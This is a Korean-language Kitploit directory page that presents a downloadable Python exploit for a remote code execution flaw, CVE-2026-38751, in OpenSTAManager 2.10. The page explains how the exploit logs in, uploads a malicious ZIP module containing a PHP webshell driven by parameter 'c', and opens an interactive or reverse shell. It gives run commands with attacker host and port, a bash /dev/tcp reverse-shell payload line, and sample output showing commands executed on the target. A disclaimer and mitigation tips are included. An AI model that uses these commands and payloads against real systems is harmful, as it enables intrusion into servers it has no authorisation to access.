Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
OpenSTAManager_RCE_Exploit-CVE-2026-38751- — OpenSTAManager RCE 익스플로잇 (CVE-2026-38751) | Kitploit
도구/GitHubGitHub/hackthem/openstamanager_rce_exploit-cve-2026-38751-
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolShellcode Generation
GitHubhackthem/openstamanager_rce_exploit-cve-2026-38751-

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

OpenSTAManager_RCE_Exploit-CVE-2026-38751-

OpenSTAManager RCE 익스플로잇 (CVE-2026-38751)

저장소 보기
152개월 전아직 검토되지 않음

OpenSTAManager RCE 익스플로잇 (CVE-2026-38751)

개요

이 Python 스크립트는 OpenSTAManager 2.10에서 확인된 CVE-2026-38751 원격 코드 실행 취약점을 익스플로잇합니다. 이 익스플로잇을 통해 인증된 사용자는 악성 모듈을 업로드하고 대상 시스템에서 임의의 명령을 실행할 수 있습니다.

취약점 세부 정보

  • CVE ID: CVE-2026-38751
  • 제품: OpenSTAManager
  • 버전: 2.10
  • 유형: 원격 코드 실행 (RCE)
  • 공격 벡터: 웹 기반, 유효한 인증 필요

익스플로잇 작동 방식

익스플로잇은 다음 단계를 따릅니다:

  1. 인증: 제공된 자격 증명을 사용하여 OpenSTAManager 애플리케이션에 로그인
  2. 업데이트 활성화: 익스플로잇에 필요한 모듈 업데이트 기능을 활성화
  3. 악성 ZIP 생성: 다음을 포함하는 ZIP 파일 생성:
    • 모듈 정의 파일 (MODULE)
    • GET 파라미터 c를 통해 명령을 실행하는 PHP 셸 스크립트 (shell.php)
  4. 모듈 업로드: 모듈 업데이트 인터페이스를 통해 악성 ZIP 업로드
  5. 익스플로잇 확인: 셸에 접근 가능하고 작동하는지 확인
  6. 명령 실행: 다음 중 하나:
    • 대화형 셸 모드로 수동 명령 실행
    • 지속적인 연결을 위한 리버스 셸 연결 설정

전제 조건

  • Python 3.x
  • 필수 Python 패키지: requests, zipfile
  • OpenSTAManager의 유효한 관리자 자격 증명
  • 대상 시스템에 대한 네트워크 접근

사용법

기본 사용법

root@kitploit:~
python3 exploit.py -u http://target.com -U admin -P password

대화형 셸 모드

root@kitploit:~
python3 exploit.py -u http://target.com -U admin -P password --interactive

리버스 셸 모드

root@kitploit:~
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444

인수

기술적 세부 사항

익스플로잇 과정

  1. 인증: 스크립트가 애플리케이션의 인증 엔드포인트에 로그인 요청을 수행
  2. 모듈 업데이트 활성화: 모듈 업데이트 기능을 활성화하기 위해 POST 요청 전송
  3. ZIP 생성: 다음을 포함하는 ZIP 아카이브 생성:
    • shell/MODULE: 모듈 구성 파일
    • shell/shell.php: GET 파라미터 c를 통해 전달된 명령을 실행하는 PHP 웹셸
  4. 업로드 프로세스: multipart form 데이터를 사용하여 악성 ZIP을 모듈 업데이트 엔드포인트에 업로드
  5. 확인: id와 같은 간단한 명령을 실행하여 업로드된 셸이 작동하는지 테스트
  6. 명령 실행: 대화형 셸을 제공하거나 리버스 셸 연결을 설정

사용된 페이로드

익스플로잇은 여러 리버스 셸 페이로드를 시도합니다:

  • Bash 리버스 셸: bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
  • Python 소켓 연결을 사용한 리버스 셸
  • Base64로 인코딩된 bash 페이로드
  • Netcat 리버스 셸

보안 고려 사항

⚠️ 면책 조항: 이 익스플로잇은 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.

위험 평가

이 취약점으로 인해 가능한 것:

  • 웹 서버 사용자로 임의의 코드 실행
  • 잠재적 권한 상승
  • 시스템에 저장된 민감한 데이터 접근
  • 네트워크 내 측면 이동 가능성

완화 방법

이 취약점을 방어하기 위해:

  1. OpenSTAManager를 최신 버전으로 업데이트
  2. 적절한 인증 제어 구현
  3. 파일 업로드 기능 제한
  4. 의심스러운 활동 모니터링
  5. 네트워크 분할 적용

예제 출력

root@kitploit:~
[ OpenSTAManager RCE Exploit : ]

Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami

[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit

참고 자료

  • GitHub 저장소
  • CVE 세부 정보

라이선스

이 익스플로잇은 교육 목적으로만 제공됩니다. 소유하지 않았거나 테스트할 명시적 권한이 없는 시스템에 대한 무단 사용은 불법입니다.

도구 다운로드
인수설명
-u, --url대상 URL (필수)
-U, --user인증을 위한 사용자 이름 (필수)
-P, --password인증을 위한 비밀번호 (필수)
--interactive대화형 셸 모드 진입
--no-cleanup실행 후 셸 파일을 제거하지 않음
--lhost리버스 셸을 위한 로컬 호스트
--lport리버스 셸을 위한 로컬 포트